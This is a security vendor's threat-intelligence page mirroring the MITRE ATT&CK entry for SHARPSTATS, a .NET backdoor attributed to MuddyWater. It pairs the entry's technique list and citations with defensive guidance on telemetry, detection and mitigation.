Live Active security incident? Get immediate response
MITRE ATT&CK® Malware

S0450: SHARPSTATS

SHARPSTATS is a .NET backdoor used by MuddyWater since at least 2019.[1]

EnterpriseS0450MalwareObject v1.1 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

SHARPSTATS matters because it is a Windows .NET backdoor associated in ATT&CK with MuddyWater and linked to discovery, PowerShell execution, command obfuscation, and tool transfer behaviors. For leaders, the decision value is not the malware name alone; it is whether the organization can see a compromised Windows endpoint being profiled, scripted, and used to bring in additional tooling before the incident expands.

Executive priority

Prioritize validation of Windows endpoint visibility, PowerShell governance, and incident response playbooks for backdoor activity. This object has no ATT&CK-provided detection guidance, so executives should ask whether SOC coverage is based on observable behaviors such as discovery commands, obfuscated command lines, and external file transfer rather than only malware signatures. This is also useful evidence for audit and resilience discussions: can the organization prove it collects the data needed to reconstruct execution, user context, network configuration discovery, system information discovery, and tool ingress on affected hosts?

Technical view

Treat SHARPSTATS coverage as behavior-driven. ATT&CK lists the malware as a Windows .NET backdoor and relates it to PowerShell execution, command obfuscation, system network configuration discovery, system owner/user discovery, system information discovery, ingress tool transfer, and system time discovery. SOC and IR teams should validate whether Windows host telemetry can connect process ancestry, command-line content, PowerShell activity, user context, network connections, and downloaded or newly written files into a single investigation timeline. Because tactics are not specified for the malware object and official detection text is not provided, detections should be mapped to the related techniques rather than to unsupported assumptions about payload internals.

Likely telemetry

  • Windows endpoint process creation and parent/child process lineage
  • PowerShell command, script block, and module activity where available
  • Command-line arguments, especially encoded, escaped, or otherwise obfuscated content
  • User logon/session context and account identifiers on the host
  • Host and network configuration discovery evidence such as interface, address, and routing-related command execution

Detection direction

  • Validate behavior-based analytics for PowerShell execution combined with discovery activity on Windows systems.
  • Tune for obfuscated command-line patterns, while accounting for legitimate administration scripts that may use encoding or complex quoting.
  • Correlate user discovery, system information discovery, network configuration discovery, and system time discovery when they occur close to suspicious execution or network activity.
  • Look for ingress tool transfer signals such as unusual external downloads, newly created executables or scripts, or file transfer following backdoor-like execution.
  • Do not rely solely on a SHARPSTATS signature; the supplied ATT&CK object provides no official detection text and the related behaviors are more durable for coverage validation.

Mitigation priorities

  • Ensure PowerShell logging and endpoint process telemetry are enabled and retained for investigation.
  • Apply least privilege and administrative script control practices appropriate to Windows environments.
  • Review controls that limit or monitor unauthorized tool downloads and file transfers from external systems.
  • Maintain incident response procedures for triaging a suspected backdoor: isolate host, preserve execution and network evidence, identify user context, and search for related discovery and transfer activity.
  • Use the related ATT&CK techniques to test detection coverage and document control evidence for compliance or readiness assessments.
Analyst notes and limits

ATT&CK identifies SHARPSTATS as a .NET backdoor used by MuddyWater since at least 2019, with the Trend Micro POWERSTATS V3 report as the cited source. The most useful defensive framing comes from the relationships to ATT&CK techniques: PowerShell, command obfuscation, multiple discovery behaviors, and ingress tool transfer.

The supplied ATT&CK fields do not include official detection guidance, aliases, labels, malware tactics, or detailed procedure examples. Local environment data is required to determine whether observed PowerShell, discovery, or file transfer activity is malicious or legitimate administration.

Official MITRE ATT&CK definition

SHARPSTATS

SHARPSTATS is a .NET backdoor used by MuddyWater since at least 2019.[1]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

7 rows
Domain ID Name Relationship / procedure
Enterprise T1016 System Network Configuration Discovery

SHARPSTATS has the ability to identify the domain of the compromised host.CitationTrendMicro POWERSTATS V3 June 2019
Enterprise T1059.001 PowerShell Sub-technique

SHARPSTATS has the ability to employ a custom PowerShell script.CitationTrendMicro POWERSTATS V3 June 2019
Enterprise T1105 Ingress Tool Transfer

SHARPSTATS has the ability to upload and download files.CitationTrendMicro POWERSTATS V3 June 2019
Enterprise T1027.010 Command Obfuscation Sub-technique

SHARPSTATS has used base64 encoding and XOR to obfuscate PowerShell scripts.CitationTrendMicro POWERSTATS V3 June 2019
Enterprise T1082 System Information Discovery

SHARPSTATS has the ability to identify the IP address, machine name, and OS of the compromised host.CitationTrendMicro POWERSTATS V3 June 2019
Enterprise T1124 System Time Discovery

SHARPSTATS has the ability to identify the current date and time on the compromised host.CitationTrendMicro POWERSTATS V3 June 2019
Enterprise T1033 System Owner/User Discovery

SHARPSTATS has the ability to identify the username on the compromised host.CitationTrendMicro POWERSTATS V3 June 2019
Associated objects

Groups, software, and campaigns

Group Enterprise

G0069: MuddyWater

MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. MuddyWater has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, MuddyWater used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. [2][3][4][5][6][7][8][9][10][11][12][13]

Relationship explorer

All related ATT&CK context

uses · Technique T1016: System Network Configuration Discovery Enterprise uses · Technique T1059.001: PowerShell Enterprise uses · Technique T1105: Ingress Tool Transfer Enterprise uses · Technique T1027.010: Command Obfuscation Enterprise uses · Group G0069: MuddyWater Enterprise uses · Technique T1082: System Information Discovery Enterprise uses · Technique T1124: System Time Discovery Enterprise uses · Technique T1033: System Owner/User Discovery Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.1
Created
Modified
Raw hash
f084732cdbd4d6a9...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.1 Current bundle f084732cdbd4…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    TrendMicro POWERSTATS V3 June 2019

    Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.

    Open source URL
  2. [2]
    mitre-attack S0450
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use